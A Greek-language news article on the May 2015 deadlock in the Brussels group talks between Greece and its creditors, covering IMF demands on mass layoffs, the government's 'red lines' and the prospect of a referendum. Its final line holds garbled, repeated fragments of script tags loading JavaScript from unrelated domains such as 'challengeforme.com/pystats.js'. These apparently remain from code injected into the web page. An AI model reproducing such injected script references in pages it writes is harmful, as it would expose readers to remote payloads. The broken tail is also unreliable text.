Αδιέξοδο στις Βρυξέλλες και νέο ραντεβού τη Δευτέρα

1

Διακοπή των διαπραγματεύσεων την Κυριακή με εμπλοκή στα θέματα των εργασιακών. Πλησιάζει η ώρα- τις επόμενες ημέρες – για τη μεγάλη απόφαση: Συμφωνία ή δημοψήφισμα…

Ραντεβού την Δευτέρα σε νέα συνεδρίαση του Brussels group έδωσαν τα τεχνικά κλιμάκια της ελληνικής αντιπροσωπείας και των δανειστών μετά το αδιέξοδο που διαπιστώθηκε χτες στα θέματα των εργασιακών σχέσεων και των ομαδικών απολύσεων, παρά το γεγονός ότι ο χρόνος τελειώνει για την επίτευξη συμφωνίας με στόχο την απελευθέρωση της χρηματοδότησης προς την Ελλάδα.

Οι «κόκκινες γραμμές»

Την ερχόμενη εβδομάδα θα ληφθούν σημαντικές αποφάσεις για το μέλλον των διαπραγματεύσεων καθώς η ελληνική κυβέρνηση επιμένει στις «κόκκινες γραμμές» και οι δανειστές επιμένουν να πιέζουν με όπλο την έλλειψη ρευστότητας στο εσωτερικό της χώρας. Η ελληνική πλευρά επιρρίπτει ευθύνες για το αδιέξοδο στις διαπραγματεύσεις στην επιμονή του ΔΝΤ για την απελευθέρωση των ομαδικών απολύσεων που αποτελεί μία από τις κόκκινες γραμμές της κυβέρνησης αλλά και την άρνησή του στην επαναφορά των συλλογικών διαπραγματεύσεων για τις συλλογικές συμβάσεις στον ιδιωτικό τομέα.

ΔΝΤ: Επιμένει στις ομαδικές απολύσεις

Σύμφωνα με κυβερνητικά στελέχη, τα τεχνικά κλιμάκια της ελληνικής αντιπροσωπίας παρουσίασαν στους θεσμούς πίνακες με στοιχεία που παρουσίαζαν την συμβολή των συλλογικών συμβάσεων στην οικονομική ανάπτυξη των δυτικών κρατών.

Παρά την παρουσίαση των στοιχείων από την ελληνική αντιπροσωπία, οι εκπρόσωποι των θεσμών, κυρίως από το ΔΝΤ, επέμεναν στην απελευθέρωση των ομαδικών απολύσεων και εξέφραζαν έντονες διαφωνίες για την επαναφορά των συλλογικών διαπραγματεύσεων.

Η ελληνική πλευρά επιμένει στις κόκκινες γραμμές για το ασφαλιστικό, τις εργασιακές σχέσεις, την αύξηση του ΦΠΑ και την ιδιωτικοποιήσεις και το επαναλαμβάνει με κάθε ευκαιρία.

Το Μέγαρο Μαξίμου από την μία πλευρά με την κατάθεση νομοσχεδίων στην βουλή επιδιώκει να καταγράψει την πρόθεση της κυβέρνησης να εφαρμόσει άμεσα ένα σημαντικό τμήμα του προγράμματος της Θεσσαλονίκηςδιαμορφώνοντας ισχυρούς δεσμούς με τμήματα της ελληνικής κοινωνίας που έχουν χτυπηθεί από την εφαρμογή του Μνημονίου.

Παράλληλα ο Πρωθυπουργός Αλέξης Τσίπρας επιρρίπτει ευθύνες στους δανειστές για την οικονομική ασφυξία που επικρατεί στην χώρα και επιμένει στις κόκκινες γραμμές της κυβέρνησης αφήνοντας ανοιχτό το ενδεχόμενο του δημοψηφίσματος σε περίπτωση που δεν ευδοκιμήσουν οι διαπραγματεύσεις.

Ο Τσίπρας θα ζητήσει έκτακτο Eurogroup

Οι διαπραγματεύσεις θα κριθούν τις επόμενες ημέρες –μέχρι την Τετάρτη – και ο Πρωθυπουργός είναι αποφασισμένος να ζητήσει έκτακτο Εurogroup ακόμα και Σύνοδο Κορυφής προκειμένου να θέσει για μία ακόμη φορά το θέμα σε πολιτικό επίπεδο.

Όμως η απάντηση των θεσμών είναι αρνητική σε ένα τέτοιο ενδεχόμενο με αποτέλεσμα η ελληνική κυβέρνηση με αιχμή τις κινήσεις και τις επικοινωνίες του Πρωθυπουργού με ξένους ηγέτες να διεκδικήσει την επίτευξη ενδιάμεσης συμφωνίας και την απελευθέρωση της χρηματοδότησης με πρώτη κίνηση καλής θέλησης μία απόφαση της ΕΚΤ για αύξηση του ποσοστού αγοράς ελληνικών ομολόγων.

Κυβέρνηση: Οι πολίτες μας στηρίζουν

Στο εσωτερικό πεδίο η ελληνική κυβέρνηση προβάλλει την στήριξη που εκφράζουν οι πολίτες στην κυβερνητική πολιτική.

Με τη ευκαιρία του εορτασμού της Πρωτομαγιάς, μία σειρά υπουργών παρευρέθηκαν στις εκδηλώσεις της ΓΣΕΕ και της ΑΔΕΔΥ με προεξέχοντα τον Γ. Βαρουφάκη.

Με την απουσία του Πρωθυπουργού από τις εκδηλώσεις τα φώτα της δημοσιότητας έπεσαν πάνω στον υπουργό Οικονομικών όπου καταγράφηκαν εκδηλώσεις στήριξης των πολιτών που συμμετείχαν στον εορτασμό της Πρωτομαγιάς, μετά τις αρνητικές εντυπώσεις που είχαν δημιουργηθεί από τι επεισόδιο στα Εξάρχεια.

Οι δηλώσεις υπουργών (Π. Σκουρλέτης, Δ. Στρατούλης και Π. Λαφαζάνης) που επισήμαναν την επιμονή της κυβέρνησης στις «κόκκινες γραμμές», σηματοδοτούσαν την στάση της κυβέρνησης στην διαπραγμάτευση.

Η προσπάθεια της κυβέρνησης να ενισχύσει το εσωτερικό μέτωπο και να προβάλλει την στήριξη που απολαμβάνει από σημαντικό τμήμα των πολιτών εντάσσεται στο πλαίσιο του «πολέμου» εντυπώσεων με τους δανειστές τονίζοντας ότι το ενδεχόμενο του δημοψηφίσματος παραμένει ανοιχτό με αυξημένες πιθανότητες λόγω της πορείας των διαπραγματεύσεων.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >